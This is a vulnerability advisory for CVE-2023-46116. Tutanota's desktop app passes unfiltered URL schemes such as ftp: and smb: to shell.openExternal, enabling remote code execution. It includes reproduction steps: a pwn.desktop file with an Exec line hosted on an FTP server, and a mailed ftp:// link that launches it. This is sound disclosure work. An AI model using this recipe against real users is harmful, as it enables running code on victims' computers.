Headline
CVE-2023-46116: Remote Code Execution via insufficiently sanitized call to shell.openExternal
Tutanota (Tuta Mail) is an encrypted email provider. Tutanota allows users to open links in emails in external applications. Prior to version 3.118.12, it correctly blocks the file:
URL scheme, which can be used by malicious actors to gain code execution on a victims computer, however fails to check other harmful schemes such as ftp:
, smb:
, etc. which can also be used. Successful exploitation of this vulnerability will enable an attacker to gain code execution on a victim’s computer. Version 3.118.2 contains a patch for this issue.
Summary
Tutanota allows users to open links in emails in external applications. It correctly blocks the file: URL scheme, which can be used by malicious actors to gain code execution on a victims computer, however fails to check other harmful schemes such as ftp:, smb:, etc. which can also be used.
Details
- Observe that on #L423 in src/desktop/ApplicationWindow.ts, the parsedUrl parameter is passed into a shell.openExternal function call.
- Observe that on #L417 in src/desktop/ApplicationWindow.ts, only the file: scheme is blocked.
- An attacker can craft a malicious email, containing a hyperlink using schemes such as ftp:, smb:, ms-msdt:, search-ms:, etc. to gain RCE on a victims computer when clicked.
Steps to Reproduce
This PoC uses Ubuntu with the XFCE desktop environment, since it is least complicated to reproduce using this setup
Execute and authenticate to the Tutanota desktop version 3.118.8 AppImage on a Ubuntu Desktop with the XFCE environment.
On another machine, host an FTP server with anonymous access enabled. Create and place a pwn.desktop file in the FTP root, with the following content:
[Desktop Entry] Exec=xcalc Type=Application
Send an email to the email account logged in on tutanota containing a hyperlink pointing to the pwn.desktop file on the FTP server. Replace the corresponding values in the hyperlink: ftp://username:password@ip-address/pwn.desktop.
On the tutanota desktop application, click on the hyperlink in the email received. Observe that the calculator application opens. You may need to confirm execution of the application in some cases.
PoC
- Video PoC for the final stage of the exploit (victim clicks on link in email):
https://user-images.githubusercontent.com/46137338/270564886-7a0389d3-f9ef-44e1-9f5e-57ccc72dcaa8.mp4
Impact
Successful exploitation of this vulnerability will enable an attacker to gain code execution on a victims computer.
References
- https://positive.security/blog/url-open-rce
- https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps#rce-via-shell.openexternal